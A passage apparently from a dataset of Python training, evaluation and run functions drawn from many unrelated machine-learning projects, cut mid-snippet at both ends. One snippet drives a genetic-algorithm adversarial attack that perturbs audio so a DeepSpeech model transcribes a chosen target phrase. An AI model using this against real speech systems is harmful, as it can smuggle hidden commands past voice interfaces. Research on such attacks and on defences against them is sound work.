self.environment.getStatistics()\n time_taken = (time.time() - time_now)\n logger.info(\"Finished epoch %d: Steps=%d; Time taken=%.2f\",\n i, j, time_taken)\n logger.info(\"\\tNumber of games: %d; Average reward: %.2f\", num_games, (total_score / num_games))\n logger.info(\"\\tFinal epsilon value for epoch: %f\", self.epsilon)\n self.network.create_checkpoint()", "def run(self):\n time.sleep(np.random.rand())\n np.random.seed(np.int32(time.time() % 1000 * self.id))\n \n # Put this in a while loop that checks a shared variable\n # Will keep running episodes until the shared variable reports False\n while(self.exit_flag == 0):\n for experience in self.run_episode():\n print(experience.state, experience.reward)\n self.training_q.put(experience)", "def run(self) -> None:\n self.model = self.trainer.train_model(self.model, self.data)", "def main():\r\n\r\n mutation_range = 150\r\n parser = argparse.ArgumentParser(description=None)\r\n parser.add_argument('--input', type=str, dest=\"input\",\r\n required=True,\r\n help=\"Input audio .wav file(s) at 16KHz\")\r\n parser.add_argument('--target', type=str,\r\n required=True,\r\n help=\"Target transcription\")\r\n parser.add_argument('--out', type=str,\r\n required=True,\r\n help=\"Path for the adversarial example(s)\")\r\n parser.add_argument('--iterations', type=int,\r\n required=False, default=1000,\r\n help=\"Maximum number of iterations of gradient descent\")\r\n parser.add_argument('--population', type=int,\r\n required=False, default=100,\r\n help=\"Population size of each generation\")\r\n parser.add_argument('--model_path', type=str,\r\n required=True,\r\n help=\"Path to the DeepSpeech checkpoint (ending in model0.4.1)\")\r\n args = parser.parse_args()\r\n while len(sys.argv) > 1:\r\n sys.argv.pop()\r\n\r\n population_size = args.population\r\n\r\n with tf.Session() as sess:\r\n # finetune = []\r\n audios = []\r\n lengths = []\r\n\r\n # if args.out is None:\r\n # assert args.outprefix is not None\r\n # else:\r\n # assert args.outprefix is None\r\n # assert len(args.input) == len(args.out)\r\n # if args.finetune is not None and len(args.finetune):\r\n # assert len(args.input) == len(args.finetune)\r\n\r\n # Load the inputs that we're given\r\n \r\n fs, audio = wav.read(args.input)\r\n # print(\"Original Audio: \" + interpret_audio(audio, fs))\r\n assert fs == 16000\r\n assert audio.dtype == np.int16\r\n # print(audio)\r\n # print('source dB', 20 * np.log10(np.max(np.abs(audio))))\r\n audios.append(list(audio))\r\n lengths.append(len(audio))\r\n\r\n for i in range(population_size):\r\n wn = np.random.randint(-mutation_range, mutation_range, size=len(audio), dtype=np.int16)\r\n mutated_audio = audio + wn\r\n audios.append(list(mutated_audio))\r\n lengths.append(len(mutated_audio))\r\n\r\n # if args.finetune is not None:\r\n # finetune.append(list(wav.read(args.finetune[i])[1]))\r\n\r\n\r\n maxlen = max(map(len, audios))\r\n audios = np.array([x + [0] * (maxlen - len(x)) for x in audios])\r\n\r\n phrase = args.target\r\n # Set up the attack class and run it\r\n attack = Attack(sess, len(phrase), maxlen, batch_size=len(audios), model_path=args.model_path)\r\n \r\n \r\n\r\n optimal_cost, optimal_audio1, optimal_audio2 = attack.attack(audios, lengths, [[toks.index(x) for x in phrase]] * len(audios), True)\r\n crossover_population = int(0.2*population_size)\r\n mutation_population = population_size - (2 * crossover_population)\r\n\r\n for i in range(args.iterations):\r\n # Reset audios to only the generational best audio\r\n print_toggle = False\r\n if (i+1) % 10 == 0:\r\n print_toggle = True\r\n\r\n audios = [optimal_audio1]\r\n lengths = [len(optimal_audio1)]\r\n\r\n \r\n\r\n mutated_audios, mutated_lengths = mutate_audio(optimal_audio1, mutation_population, mutation_range)\r\n crossover_audios, crossover_lengths = crossover_audio(optimal_audio1, optimal_audio2, crossover_population)\r\n\r\n audios.extend(mutated_audios)\r\n audios.extend(crossover_audios)\r\n\r\n lengths.extend(mutated_lengths)\r\n lengths.extend(crossover_lengths)\r\n\r\n \r\n xcost, xaudio1, xaudio2 = attack.attack(audios, lengths, [[toks.index(x) for x in phrase]] * len(audios), print_toggle)\r\n\r\n if xcost < optimal_cost:\r\n optimal_cost = xcost\r\n optimal_audio1 = xaudio1\r\n optimal_audio2 = xaudio2\r\n \r\n print(\"iteration: \" + str(i+1) + \"\\t\" + \"Cost: \" + str(optimal_cost))\r\n\r\n wav.write(args.out, 16000, optimal_audio1)", "def eval(self):\n self.train(mode=False)", "def learn(self):\n\n for i in range(1, self.args.numIters + 1):\n print('------ ITER ' + str(i) + '------')\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n for eps in range(self.args.numEps):\n print('------ Self Play Episode ' + str(eps) + '------')\n self.mcts = TSPMCTS(self.args, self.game, self.nnet) # reset search tree\n iterationTrainExamples += self.executeEpisode()\n\n # save the iteration examples to the history\n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n self.trainExamplesHistory.pop(0)\n\n # shuffle examples before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n\n # training new network\n if self.args.numEps > 0:\n self.nnet.train(trainExamples)\n nmcts = TSPMCTS(self.args, self.game, self.nnet)\n\n print('PLAYING GAMES')\n if self.args.arenaCompare:\n arena = SinglePlayerArena(lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game)\n wins, losses = arena.playSinglePlayerGames(self.args.arenaCompare)\n print('WINS/LOSSES: %d / %d' % (wins, losses))", "def run(self):\n try:\n for i in range(self.game_batch_num):\n episode_len = self.collect_selfplay_data()\n if len(self.data_buffer) > self.batch_size:\n loss, entropy = self.policy_update()\n print((\"batch i:{}, \"\n \"episode_len:{}, \"\n \"loss:{:.4f}, \"\n \"entropy:{:.4f}\"\n ).format(i+1,\n episode_len,\n loss,\n entropy))\n else:\n print(\"batch i:{}, \"\n \"episode_len:{}\".format(i+1, episode_len))\n # 定期保存模型\n if (i+1) % self.check_freq == 0:\n self.policy_value_net.save_model(\n './current_policy.model')\n except KeyboardInterrupt:\n print('\\n quit')", "def train(self):\n self.epoch = 0\n self.step = 0\n self.start_time = time.time()\n for self.epoch in range(self.opt.num_epochs):\n self.run_epoch()\n if (self.epoch + 1) % self.opt.save_frequency == 0:\n self.save_model()", "def train(self):\n self.epoch = 0\n self.step = 0\n self.start_time = time.time()\n for self.epoch in range(self.num_epochs):\n print(\"EPOHA\")\n self.run_epoch()\n print(\"SAVE MODEL\")\n self.save_model()", "def train(self):\n # self.recognizer.train()\n self.detector.train()\n self.shared_conv.train()", "def eval_model(self, eval_data): # noqa: ignore flake8\"\n os.makedirs(self.model_dir, exist_ok=True)\n source_texts, target_texts = create_dataset(eval_data)\n logger.info(\"Evaluating the model...\")\n logger.info(\"Number of examples: {}\".format(len(source_texts)))\n\n if self.src_2_ids is None:\n self.src_2_ids = load_word_dict(self.src_vocab_path)\n self.trg_2_ids = load_word_dict(self.trg_vocab_path)\n if self.model is None:\n if os.path.exists(self.model_path):\n self.model = Seq2Seq(\n encoder_vocab_size=len(self.src_2_ids),\n decoder_vocab_size=len(self.trg_2_ids),\n embed_size=self.embed_size,\n enc_hidden_size=self.hidden_size,\n dec_hidden_size=self.hidden_size,\n dropout=self.dropout\n )\n self.load_model()\n self.model.to(device)\n else:\n raise ValueError(\"Model not found at {}\".format(self.model_path))\n self.model.eval()\n\n train_src, train_trg = one_hot(source_texts, target_texts, self.src_2_ids, self.trg_2_ids, sort_by_len=True)\n\n id_2_srcs = {v: k for k, v in self.src_2_ids.items()}\n id_2_trgs = {v: k for k, v in self.trg_2_ids.items()}\n logger.debug(f'evaluate src: {[id_2_srcs[i] for i in train_src[0]]}')\n logger.debug(f'evaluate trg: {[id_2_trgs[i] for i in train_trg[0]]}')\n eval_data = gen_examples(train_src, train_trg, self.batch_size, self.max_length)\n\n total_num_words = 0.\n total_loss = 0.\n with torch.no_grad():\n for it, (mb_x, mb_x_len, mb_y, mb_y_len) in enumerate(eval_data):\n mb_x = torch.from_numpy(mb_x).to(device).long()\n mb_x_len = torch.from_numpy(mb_x_len).to(device).long()\n mb_input = torch.from_numpy(mb_y[:, :-1]).to(device).long()\n mb_output = torch.from_numpy(mb_y[:, 1:]).to(device).long()\n mb_y_len = torch.from_numpy(mb_y_len - 1).to(device).long()\n mb_y_len[mb_y_len <= 0] = 1\n\n mb_pred, attn = self.model(mb_x, mb_x_len, mb_input, mb_y_len)\n\n mb_out_mask = torch.arange(mb_y_len.max().item(), device=device)[None, :] < mb_y_len[:, None]\n mb_out_mask = mb_out_mask.float()\n\n loss = self.loss_fn(mb_pred, mb_output, mb_out_mask)\n\n num_words = torch.sum(mb_y_len).item()\n total_loss += loss.item() * num_words\n total_num_words += num_words\n loss = total_loss / total_num_words\n logger.info(f\"Evaluation loss: {loss}\")\n return {'loss': loss}", "def train(self):\n params = self.params\n self.encoder.train()\n self.proj.train()\n\n # training variables\n losses = []\n ns = 0 # number of sentences\n nw = 0 # number of words\n t = time.time()\n\n iterator = self.get_iterator('train', 'en')\n lang, lang_id = 'en', params.lang2id['en']\n while True:\n # batch\n try:\n batch = next(iterator)\n except StopIteration:\n break\n (sent1, len1), idx = batch\n x, lengths = truncate(sent1, len1, params.max_len, params.eos_index)\n lang_ids = x.clone().fill_(lang_id)\n\n y = self.data['en']['train']['y'][idx]\n bs = len(len1)\n\n # cuda\n x, y, lengths, lang_ids = to_cuda(x, y, lengths, lang_ids)\n\n # loss\n output = self.proj(self.encoder.get_embeddings(x, lengths, langs=lang_ids))\n loss = F.cross_entropy(output, y)\n\n # backward / optimization\n self.optimizer_e.zero_grad()\n self.optimizer_p.zero_grad()\n loss.backward()\n self.optimizer_e.step()\n self.optimizer_p.step()\n\n # update statistics\n ns += bs\n nw += lengths.sum().item()\n losses.append(loss.item())\n\n # log\n if ns % (100 * bs) < bs:\n logger.info(\"CLF - Epoch %i - Train iter %7i - %.1f words/s - Loss: %.4f\" % (\n self.epoch, ns, nw / (time.time() - t), sum(losses) / len(losses)))\n nw, t = 0, time.time()\n losses = []\n\n # epoch size\n if params.epoch_size != -1 and ns >= params.epoch_size:\n break", "def run(self):\n # This should do nothing if the user has already configured\n # logging, and will it least enable error messages otherwise.\n logging.basicConfig()\n\n # If this is resumption from a checkpoint, it is crucial to\n # reset `profile.current`. Otherwise, it simply does not hurt.\n self.profile.current = []\n\n # Sanity check for the most common case\n if (self._model and isinstance(self._model, Model) and\n isinstance(self.algorithm, GradientDescent)):\n if not (set(self._model.get_parameter_dict().values()) ==\n set(self.algorithm.parameters)):\n logger.warning(\"different parameters for model and algorithm\")\n\n with change_recursion_limit(config.recursion_limit):\n self.original_sigint_handler = signal.signal(\n signal.SIGINT, self._handle_epoch_interrupt)\n self.original_sigterm_handler = signal.signal(\n signal.SIGTERM, self._handle_batch_interrupt)\n try:\n logger.info(\"Entered the main loop\")\n if not self.status['training_started']:\n for extension in self.extensions:\n extension.main_loop = self\n self._run_extensions('before_training')\n with Timer('initialization', self.profile):\n self.algorithm.initialize()\n self.status['training_started'] = True\n # We can not write \"else:\" here because extensions\n # called \"before_training\" could have changed the status\n # of the main loop.\n if self.log.status['iterations_done'] > 0:\n self.log.resume()\n self._run_extensions('on_resumption')\n self.status['epoch_interrupt_received'] = False\n self.status['batch_interrupt_received'] = False\n with Timer('training', self.profile):\n while self._run_epoch():\n pass\n except TrainingFinish:\n self.log.current_row['training_finished'] = True\n except Exception as e:\n self._restore_signal_handlers()\n self.log.current_row['got_exception'] = traceback.format_exc()\n logger.error(\"Error occured during training.\" + error_message)\n try:\n self._run_extensions('on_error')\n except Exception:\n logger.error(traceback.format_exc())\n logger.error(\"Error occured when running extensions.\" +\n error_in_error_handling_message)\n reraise_as(e)\n finally:\n self._restore_signal_handlers()\n if self.log.current_row.get('training_finished', False):\n self._run_extensions('after_training')\n if config.profile:\n self.profile.report()", "def training(self) -> None:\n self.compile_model()\n self.train_epoch()\n self.agent.save()", "def run_epoch(model, data, id_2_word, is_train=False, is_test=False, lr=1.0):\n if is_train:\n model.train() # train the model\n else:\n model.eval() # test or validate the model\n\n future_word_num = args.future_word_num\n epoch_size = ((len(data) // model.module.batch_size) - future_word_num) // model.module.num_steps\n start_time = time.time()\n hidden = model.module.init_hidden()\n\n costs = 0.0\n iters = 0\n # total = 0\n # correct = 0\n # total_train = 0\n # correct_train = 0\n true_pos = 0\n false_pos = 0\n false_neg = 0\n\n for step, (x, y) in enumerate(reader.ptb_iterator(data, model.module.batch_size, model.module.num_steps, future_word_num)):\n\n inputs = Variable(torch.from_numpy(x.astype(np.int64)).transpose(0,1).contiguous()).cuda()\n #print(inputs.size())\n #print(inputs)\n # model.zero_grad() # clear the gradient in previous step\n\n hidden = repackage_hidden(hidden) # type(hidden) is 'tuple'\n outputs, hidden = model(inputs, hidden)\n\n # outputs = F.sigmoid(outputs);\n\n # targets = Variable(torch.from_numpy(y.astype(np.int64)).transpose(0,1).contiguous()).cuda()\n \n\n # tt = torch.squeeze(targets.view(-1, model.module.batch_size * model.module.num_steps))\n # reshape y into a 1-d tensor\n\n index = []\n for j in range(y.shape[1]-future_word_num+1):\n pair = y[:, j:j+future_word_num]\n index.append(pair)\n\n index_ = np.asarray(index)\n target_loss = []\n for i in range(model.module.num_steps):\n t = index_[i]\n for j in range(model.module.batch_size):\n t_ = t[j]\n tt = np.zeros(vocab_size, dtype=np.int64)\n tt[t_] = 1\n target_loss.append(tt)\n\n targetLoss = np.asarray(target_loss)\n targetLoss = Variable(torch.from_numpy(targetLoss).contiguous()).float().cuda()\n\n # outputs.view(-1, model.vocab_size).size() = 700 x 10000\n # tt.size() = 700\n # inp = torch.squeeze(inputs.view(-1, model.batch_size * model.num_steps))\n out_loss = outputs.view(-1, model.module.vocab_size)\n # max_val, index = torch.max(out_loss, dim=1)\n\n # ######\n # word_inp = []\n # word_pred = []\n # word_tt = []\n # word_id_pred = []\n # word_id_tt = []\n\n # for i in range(list(index.size())[0]):\n # ind_inp = inp.data[i]\n # w_inp = id_2_word[ind_inp]\n # word_inp.append(w_inp)\n\n # ind_pred = list(index.data[i])[0]\n # w_pred = id_2_word[ind_pred]\n # word_pred.append(w_pred)\n # word_id_pred.append(ind_pred)\n\n # ind_tt = tt.data[i]\n # w_tt = id_2_word[ind_tt]\n # word_tt.append(w_tt)\n # word_id_tt.append(ind_tt)\n \n # word_inp_print = np.reshape(word_inp, (model.num_steps, model.batch_size)).T\n # word_pred_print = np.reshape(word_pred, (model.num_steps, model.batch_size)).T\n # word_tt_print = np.reshape(word_tt, (model.num_steps, model.batch_size)).T\n # word_id_pred_ = np.reshape(word_id_pred, (model.num_steps, model.batch_size)).T\n # word_id_tt_ = np.reshape(word_id_tt, (model.num_steps, model.batch_size)).T\n # pred_word_id = np.asarray(word_id_pred_)\n # target_word_id = np.asarray(word_id_tt_)\n ######\n\n # loss = criterion(out_loss, tt)\n loss = criterion(out_loss, targetLoss)\n # loss.data[0] -> get the loss value\n\n costs += loss.data[0] * model.module.num_steps\n iters += model.module.num_steps\n\n if is_train:\n optimizer.zero_grad()\n loss.backward() # backward propagation\n torch.nn.utils.clip_grad_norm(model.parameters(), 0.25) # prevent gradient exploding\n optimizer.step()\n #for name, p in model.named_parameters():\n # \"\"\"if p.requires_grad:\n # print(name, p.data.size()) \"\"\"\n #p.data.add_(-lr, p.grad.data) # update the weight and bias\n if step % (epoch_size // 10) == 10:\n print(\"{} loss: {:8.5f}\".format(step * 1.0 / epoch_size, (costs/iters)))\n # print(\"{} perplexity: {:8.2f} speed: {} wps\".format(step * 1.0 / epoch_size, np.exp(costs / iters),\n # iters * model.batch_size / (time.time() - start_time)))\n \n # print(\"input:\")\n # print(word_inp_print)\n # print(\"----------------------\")\n # print(\"predict:\")\n # print(word_pred_print)\n # print(\"----------------------\")\n # print(\"target:\")\n # print(word_tt_print)\n\n # savewords(word_inp_print, 'input_train')\n # savewords(word_pred_print, 'predict_train')\n # savewords(word_tt_print, 'target_train')\n # elif is_test:\n # savewords(word_inp_print, 'input_test')\n # savewords(word_pred_print, 'predict_test')\n # savewords(word_tt_print, 'target_test')\n\n if is_train: \n diff_train = (torch.sign(out_loss) - targetLoss).data.cpu().numpy()\n tp = (diff_train == 0).sum()\n fp = (diff_train == 1).sum()\n fn = (diff_train == -2).sum()\n true_pos += tp\n false_pos += fp\n false_neg += fn\n\n if (is_train == False):\n diff_ = (torch.sign(out_loss) - targetLoss).data.cpu().numpy()\n tp = (diff_ == 0).sum()\n fp = (diff_ == 1).sum()\n fn = (diff_ == -2).sum()\n true_pos += tp\n false_pos += fp\n false_neg += fn\n\n if is_train:\n precision = true_pos / (true_pos + false_pos)\n recall = true_pos / (true_pos + false_neg)\n f1_score = 2 * precision * recall / (precision + recall)\n\n print(\"Training Precision: {:8.5f}\".format(precision))\n print(\"Training Recall: {:8.5f}\".format(recall))\n print(\"Training F1 score: {:8.5f}\".format(f1_score))\n\n if (is_train == False):\n precision = true_pos / (true_pos + false_pos)\n recall = true_pos / (true_pos + false_neg)\n f1_score = 2 * precision * recall / (precision + recall)\n\n print(\"Precision: {:8.5f}\".format(precision))\n print(\"Recall: {:8.5f}\".format(recall))\n print(\"F1 score: {:8.5f}\".format(f1_score))\n\n\n # if is_train:\n # total_train += model.batch_size \n # last = pred_word_id.shape[1]-1\n\n # for i in range(pred_word_id.shape[0]):\n # if (pred_word_id[i][last]==target_word_id[i][last]):\n # correct_train += 1\n\n # if (is_train == False):\n # total += model.batch_size\n # last = pred_word_id.shape[1]-1\n\n # for i in range(pred_word_id.shape[0]):\n # if (pred_word_id[i][last]==target_word_id[i][last]):\n # correct += 1\n\n\n # if is_train:\n # train_accuracy = correct_train / total_train * 100\n # print(\"accuracy: {:8.2f}\".format(train_accuracy))\n\n # if (is_train == False):\n # accuracy = correct / total * 100\n # print(\"accuracy: {:8.2f}\".format(accuracy))\n\n return (costs / iters)\n # return np.exp(costs / iters) ", "def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)", "def run_step(self, model: SpeechModel, sess: tf.Session, stats: TestStatistics, save: bool, verbose=True, feed_dict: Dict=None):\n\n global_step = model.global_step.eval()\n \n if save:\n # Validate on the data set and write the summary\n avg_loss, decoded, label, summary = model.step(sess, update=False, decode=True, return_label=True, summary=True, feed_dict=feed_dict)\n model.summary_writer.add_summary(summary, global_step)\n \n else:\n # simply validate, no need to write the summary.\n avg_loss, decoded, label = model.step(sess, update=False, decode=True, return_label=True, feed_dict=feed_dict)\n \n decoded_ids_paths = [Test.extract_decoded_ids(path) for path in decoded]\n \n for label_ids in Test.extract_decoded_ids(label):\n expected_str = self.idsToSentence(label_ids)\n\n # Print the actual transcript text and the decoded (predicted) text\n # along with it, print the LED and WED so that we know how many letters and \n # words were incorrectly predicted.\n if verbose:\n print('Actual: {}'.format(expected_str))\n \n for decoded_path in decoded_ids_paths:\n decoded_ids = next(decoded_path)\n decoded_str = self.idsToSentence(decoded_ids)\n stats.track_decoding(decoded_str, expected_str)\n \n if verbose:\n print('Predicted: {}'.format(decoded_str))\n print('LED: {} WED: {}'.format(stats.letter_edit_distance,stats.word_edit_distance))", "def train(self):\r\n self.speaker2index_and_index2speaker()\r\n \"\"\"Initialize history matrix\"\"\"\r\n self.history = np.random.normal(loc=0, scale=0.1, size=(len(self.s2i), config.train.class_history))\r\n \"\"\"\"\"\"\r\n \"\"\"\"\"\"\r\n iterations = 0\r\n \"\"\"Get train/test\"\"\"\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"CTC loss\"\"\"\r\n # self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='mean')\r\n self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='none')\r\n for epoch in range(config.train.num_epochs):\r\n \"\"\"Make dataloader\"\"\"\r\n train_data = Dataset({'files': train, 'mode': 'train', 'metadata_help': metadata_help})\r\n train_gen = data.DataLoader(train_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=train_data.collate, drop_last=True)\r\n val_data = Dataset({'files': val, 'mode': 'train', 'metadata_help': metadata_help})\r\n val_gen = data.DataLoader(val_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=val_data.collate, drop_last=True)\r\n\r\n for batch_number, features in enumerate(train_gen):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n input_lengths = features['input_lengths']\r\n target_lengths = features['target_lengths']\r\n metadata = features[\"metadata\"]\r\n batch_speakers = [x['speaker'] for x in metadata]\r\n self.G = self.G.train()\r\n\r\n #ipdb.set_trace()\r\n \"\"\"Make input_lengths and target_lengths torch ints\"\"\"\r\n input_lengths = input_lengths.to(torch.int32)\r\n target_lengths = target_lengths.to(torch.int32)\r\n phones = phones.to(torch.int32)\r\n\r\n outputs = self.G(spectrograms)\r\n\r\n outputs = outputs.permute(1, 0, 2) # swap batch and sequence length dimension for CTC loss\r\n\r\n loss = self.ctc_loss(log_probs=outputs, targets=phones,\r\n input_lengths=input_lengths, target_lengths=target_lengths)\r\n\r\n \"\"\"Update the loss history\"\"\"\r\n self.update_history(loss, batch_speakers)\r\n if epoch >= config.train.regular_epochs:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[0])\r\n else:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[1])\r\n loss = loss * loss_weights\r\n\r\n # Backward and optimize.\r\n self.reset_grad()\r\n # loss.backward()\r\n loss.sum().backward()\r\n self.g_optimizer.step()\r\n\r\n if iterations % self.log_step == 0:\r\n print(str(iterations) + ', loss: ' + str(loss.sum().item()))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('loss', loss.sum().item(), iterations)\r\n\r\n if iterations % self.model_save_step == 0:\r\n \"\"\"Calculate validation loss\"\"\"\r\n val_loss = self.val_loss(val=val_gen, iterations=iterations)\r\n print(str(iterations) + ', val_loss: ' + str(val_loss))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('val_loss', val_loss, iterations)\r\n \"\"\"Save model checkpoints.\"\"\"\r\n if iterations % self.model_save_step == 0:\r\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(iterations))\r\n torch.save({'model': self.G.state_dict(),\r\n 'optimizer': self.g_optimizer.state_dict()}, G_path)\r\n print('Saved model checkpoints into {}...'.format(self.model_save_dir))\r\n\r\n iterations += 1", "def run(self):\n\t\tself._run_neural_network()\n\t\tself._run_webots()\n\n\t\t# We first wait for webots inputs\n\t\twebotsTurn = True\n\t\tneuralNetworkTurn = False\n\t\twhile True:\n\t\t\tif webotsTurn:\n\t\t\t\tprint \"reading data from webots:\"\n\t\t\t\twbtData = self._wbt_read_data()\n\t\t\t\tprint \"sending data to nn...\"\n\t\t\t\tself._send_data_to_nn(wbtData)\n\t\t\t\twebotsTurn = False\n\t\t\t\tneuralNetworkTurn = True\n\n\t\t\telif neuralNetworkTurn:\n\n\t\t\t\tprint \"reading data from nn:\"\n\t\t\t\tnnData = self._nn_read_data()\n\t\t\t\tif self._neuralNetwork.poll() != None: break\n\t\t\t\tprint \"sending data to webots...\"\n\t\t\t\tself._send_data_to_wbt(nnData)\n\t\t\t\tneuralNetworkTurn = False\n\t\t\t\twebotsTurn = True", "def train():\n pass", "def train(self):\n for i in xrange(self.num_steps):\n if c.ADVERSARIAL:\n # update discriminator\n batch = get_train_batch()\n print 'Training discriminator...'\n self.d_model.train_step(batch, self.g_model)\n\n # update generator\n batch = get_train_batch()\n print 'Training generator...'\n self.global_step = self.g_model.train_step(\n batch, discriminator=(self.d_model if c.ADVERSARIAL else None))\n\n # save the models\n if self.global_step % c.MODEL_SAVE_FREQ == 0:\n print '-' * 30\n print 'Saving models...'\n self.saver.save(self.sess,\n c.MODEL_SAVE_DIR + 'model.ckpt',\n global_step=self.global_step)\n print 'Saved models!'\n print '-' * 30\n\n # test generator model\n if self.global_step % c.TEST_FREQ == 0:\n self.test()", "def run(cfg): # pylint: disable=too-many-locals,too-many-statements\n # load_text\n voca, gazet, data_, pos_model, word_model = load_text(cfg)\n\n char_voca = voca['in']\n\n # Build Ner model\n model = build_model(cfg, char_voca=char_voca, word_voca=None,\n gazet=gazet, pos_voca=pos_model.cfg.voca['out'])\n\n epoch_syl_cnt = data_['train'].get_syllable_count()\n iter_per_epoch = epoch_syl_cnt // cfg.batch_size\n iter_to_rvt = iter_per_epoch * cfg.rvt_epoch\n\n # Load GPU\n if torch.cuda.is_available():\n model.cuda()\n\n # Loss / Optimizer\n criterion = nn.CrossEntropyLoss()\n optimizer = cfg.optimizer(model.parameters())\n\n losses = []\n accuracies = []\n f_scores = []\n\n iter_ = 1\n best_iter = 0\n\n # Remove existing log directory\n if cfg.clean:\n logging.info('==== removing log: %s ====', cfg.model_dir)\n shutil.rmtree(cfg.model_dir)\n time.sleep(3)\n\n else:\n if cfg.ckpt_path.exists():\n logging.info('==== reverting from check point ====')\n model_dump = CheckPoint.load(cfg.ckpt_path)\n model.load_state_dict(model_dump['model'])\n optimizer.load_state_dict(model_dump['optim'])\n best_iter = model_dump['iter']\n iter_ = best_iter + 1\n losses.append(model_dump['loss'])\n accuracies.append(model_dump['accuracy'])\n f_scores.append(model_dump['f-score'])\n logging.info('---- iter: %dk, loss: %f, accuracy: %f, f-score: %f ----',\n iter_ // 1000, losses[-1], accuracies[-1], f_scores[-1])\n lrs = [param_group['lr'] for param_group in optimizer.param_groups]\n logging.info('learning rates: %s', ', '.join([str(_) for _ in lrs]))\n\n # Tensorboard Summary Writer\n sum_wrt = SummaryWriter(cfg.model_dir)\n\n # loss / accuracy / f-score logging (.tsv)\n log_path = cfg.model_dir.joinpath('log.tsv')\n logf = open(log_path, 'at' if cfg.ckpt_path.exists() else 'wt')\n if os.path.getsize(log_path) == 0:\n print('iter\\tloss\\taccuracy\\tf-score', file=logf)\n\n # Main Training Loop\n revert = 0\n one_more_thing = True # one more change to increase learning rate into 10 times\n batches = []\n while revert <= cfg.rvt_term or one_more_thing:\n for train_sent in data_['train']:\n # Convert to Tensor\n # labels [sentence_len]\n # contexts [sentence_len, 21]\n # gazet [sentence_len, 21, 15]\n train_sent.set_word_feature(pos_model, word_model, cfg.window)\n train_sent.set_pos_feature(pos_model, cfg.window)\n train_labels, train_contexts, train_gazet, train_pos, train_words = \\\n train_sent.to_tensor(voca, gazet, cfg.window, cfg.phoneme, cfg.gazet_embed)\n\n # Convert to Variable\n train_labels = Variable(train_labels)\n train_contexts = Variable(train_contexts)\n train_gazet = Variable(train_gazet)\n train_pos = Variable(train_pos, requires_grad=False)\n train_words = Variable(train_words, requires_grad=False)\n\n # Load on GPU\n if torch.cuda.is_available():\n train_labels = train_labels.cuda()\n train_contexts = train_contexts.cuda()\n train_gazet = train_gazet.cuda()\n train_pos = train_pos.cuda()\n train_words = train_words.cuda()\n\n # Reset Gradient\n optimizer.zero_grad()\n\n # Training mode (updates/dropout/batchnorm)\n model.train()\n\n # import ipdb; ipdb.set_trace()\n\n # Forward Prop\n outputs = model(train_contexts, train_gazet, train_pos, train_words)\n\n batches.append((train_labels, outputs))\n if sum([batch[0].size(0) for batch in batches]) < cfg.batch_size:\n continue\n batch_label = torch.cat([x[0] for x in batches], 0)\n batch_output = torch.cat([x[1] for x in batches], 0)\n batches = []\n\n # Backprop\n loss = criterion(batch_output, batch_label)\n loss.backward()\n optimizer.step()\n\n # Validation\n if iter_ % 1000 == 0:\n measure = tagger.PerformanceMeasure()\n # Freeze parameters\n model.eval()\n\n # Calculate loss\n losses.append(loss.data[0])\n for dev_sent in data_['dev']:\n # Convert to CUDA Variable\n dev_sent.set_word_feature(pos_model, word_model, cfg.window)\n 